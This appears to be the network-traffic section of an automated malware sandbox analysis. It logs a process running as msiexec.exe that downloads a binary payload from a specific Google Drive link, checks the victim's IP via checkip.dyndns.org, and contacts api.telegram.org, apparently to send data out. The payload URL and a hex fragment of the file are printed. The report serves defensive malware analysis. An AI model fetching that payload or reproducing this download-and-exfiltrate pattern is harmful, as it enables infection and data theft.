                                                                                                  Dec 17, 2024 12:06:11.683732033 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.683825970 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.690607071 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.690677881 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.694201946 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.694273949 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.703826904 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.703906059 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.707389116 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.707459927 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.717835903 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.717951059 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.721329927 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.721396923 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.735202074 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.735270023 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.738549948 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.738657951 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.755029917 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.755109072 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.758449078 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.758538961 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.759563923 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.759628057 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.766932964 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.767033100 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.772044897 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.772138119 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.772202969 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.772294998 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.786508083 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.786602974 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.811130047 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.811194897 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.811223030 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.811323881 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.838836908 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.840344906 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.840372086 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.840486050 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.841198921 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.841329098 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.846120119 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.846266985 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.846271992 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.846383095 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.850275040 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.852258921 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.852273941 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.852369070 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.860449076 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.860543966 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.860584974 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.860652924 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.860666990 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.860733986 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.871205091 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.872822046 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.872840881 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.872967005 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.881993055 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.882180929 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.882191896 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.882271051 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.892332077 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.892376900 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.892414093 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.892472982 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.902120113 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.902175903 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.902247906 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.902299881 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.912290096 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.912441969 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.912462950 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.912508011 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.922426939 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.922509909 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.922560930 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.922884941 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.932462931 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.932521105 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.932549953 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.932609081 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.942718029 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.942774057 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.942837000 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.942893982 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.952667952 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.952721119 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.952788115 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.952857971 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.962629080 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.962687016 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.962712049 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.962762117 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.971848965 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.971910000 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.971939087 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.971988916 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.980539083 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.980614901 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.980663061 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.980726004 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.980772972 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.980834007 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.980890989 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:11.980972052 CET44349819142.250.181.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:11.981215954 CET49819443192.168.2.5142.250.181.1
                                                                                                  Dec 17, 2024 12:06:12.773257971 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:12.893707991 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:12.893862009 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:12.894372940 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:13.014380932 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:17.262450933 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:17.269424915 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:17.390891075 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:20.590322971 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:20.639801025 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:26.311580896 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:26.431647062 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:26.661261082 CET8049834193.122.130.0192.168.2.5
                                                                                                  Dec 17, 2024 12:06:26.702351093 CET4983480192.168.2.5193.122.130.0
                                                                                                  Dec 17, 2024 12:06:26.891762018 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:26.891778946 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:26.891860962 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:26.893800974 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:26.893811941 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.269702911 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.269889116 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.271820068 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.271833897 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.272219896 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.275780916 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.323333025 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:28.323496103 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:28.323510885 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.129879951 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.129966974 CET44349867149.154.167.220192.168.2.5
                                                                                                  Dec 17, 2024 12:06:29.130109072 CET49867443192.168.2.5149.154.167.220
                                                                                                  Dec 17, 2024 12:06:29.131406069 CET49867443192.168.2.5149.154.167.220
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 17, 2024 12:06:03.550915003 CET5631553192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 12:06:03.689093113 CET53563151.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:06.572205067 CET5557253192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 12:06:06.710455894 CET53555721.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:12.628402948 CET5194753192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET53519471.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 12:06:26.663752079 CET5456853192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 12:06:26.890739918 CET53545681.1.1.1192.168.2.5
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 17, 2024 12:06:03.550915003 CET192.168.2.51.1.1.10x9403Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:06.572205067 CET192.168.2.51.1.1.10x1299Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.628402948 CET192.168.2.51.1.1.10x2dc0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:26.663752079 CET192.168.2.51.1.1.10x6c02Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 17, 2024 12:06:03.689093113 CET1.1.1.1192.168.2.50x9403No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:06.710455894 CET1.1.1.1192.168.2.50x1299No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:12.768290043 CET1.1.1.1192.168.2.50x2dc0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 12:06:26.890739918 CET1.1.1.1192.168.2.50x6c02No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  • api.telegram.org
                                                                                                  • checkip.dyndns.org
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549834193.122.130.0805064C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 17, 2024 12:06:12.894372940 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 17, 2024 12:06:17.262450933 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 17 Dec 2024 11:06:17 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 80fcafc65f836670cab9583eb034cf3a
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                  Dec 17, 2024 12:06:17.269424915 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Dec 17, 2024 12:06:20.590322971 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                  Date: Tue, 17 Dec 2024 11:06:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 557
                                                                                                  Connection: keep-alive
                                                                                                  X-Request-ID: e5a3481c2c67b28c4ab16a6a82f3e4f4
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                  Dec 17, 2024 12:06:26.311580896 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Dec 17, 2024 12:06:26.661261082 CET321INHTTP/1.1 200 OK
                                                                                                  Date: Tue, 17 Dec 2024 11:06:26 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 1df681c7e6d35ef9846814b0a13c8d89
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549813172.217.19.1744435064C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 11:06:05 UTC216OUTGET /uc?export=download&id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-12-17 11:06:06 UTC1920INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Tue, 17 Dec 2024 11:06:06 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'nonce-RuMcL-yuGwh16nvUoBtF8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549819142.250.181.14435064C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-17 11:06:08 UTC258OUTGET /download?id=1w87NQvj6b5S9uXyLLfc2i0svzMpp5EWJ&export=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-12-17 11:06:11 UTC4930INHTTP/1.1 200 OK
                                                                                                  X-GUploader-UploadID: AFiumC7k4TKhR2CEK56jcccJkK3-W1csLBWmteZ_1aGcK_Wegza0IZxCphRAAmcUGGZEfwmw
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="hsISdySQ90.bin"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 93760
                                                                                                  Last-Modified: Tue, 19 Nov 2024 20:10:07 GMT
                                                                                                  Date: Tue, 17 Dec 2024 11:06:11 GMT
                                                                                                  Expires: Tue, 17 Dec 2024 11:06:11 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=irNcaA==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
                                                                                                  2024-12-17 11:06:11 UTC4930INData Raw: 1b d9 0e d9 fc 81 5a 63 a1 ed 7b 3d fd c3 c1 14 e5 83 a5 92 05 6a 71 5a fe 30 d3 74 5b 32 2f 8d 8b 45 2c a8 9e b8 00 a6 aa ca d1 3a b1 8e ab c3 e2 35 24 91 ba 26 f4 a8 36 24 f3 e1 62 97 16 5b ff ae b3 42 6c c8 3f 9d 05 cc 98 e6 2e 0c 67 7d f2 1b 71 72 13 81 c3 c6 3d 0b 5b 0a b8 28 67 7d 08 62 da 33 e4 8d e4 ab aa 1a c3 ae 56 b6 ad 7f 74 f6 f8 0d 33 10 9b 50 71 72 82 82 2e 6b 5d 3e 8e 43 06 24 2b a2 c3 c6 90 4c 1c 00 12 62 88 a3 19 5d bb ca 20 1a a5 09 aa b1 e6 7a 41 a1 ce b6 4d e7 c2 63 ef 7a d2 87 3b 4f e7 63 7a e3 09 fb 63 58 91 2b 73 60 bb b7 10 fa 5f a6 4f 71 d3 34 0d f4 9d ec 86 0d e7 e4 27 b0 11 d7 a1 fb f1 f0 42 da 87 e8 2e 49 b0 51 23 e3 78 a7 67 39 85 bd 47 27 91 eb 2f c7 6e 08 a4 41 8a 71 47 00 31 df 3c 8b 8b 8f 10 48 02 e5 d2 bc 46 f5 17 62 2d
                                                                                                  Data Ascii: Zc{=jqZ0t[2/E,:5$&6$b[Bl?.g}qr=[(g}b3Vt3Pqr.k]>C$+Lb] zAMcz;OczcX+s`_Oq4'B.IQ#xg9G'/nAqG1<HFb-
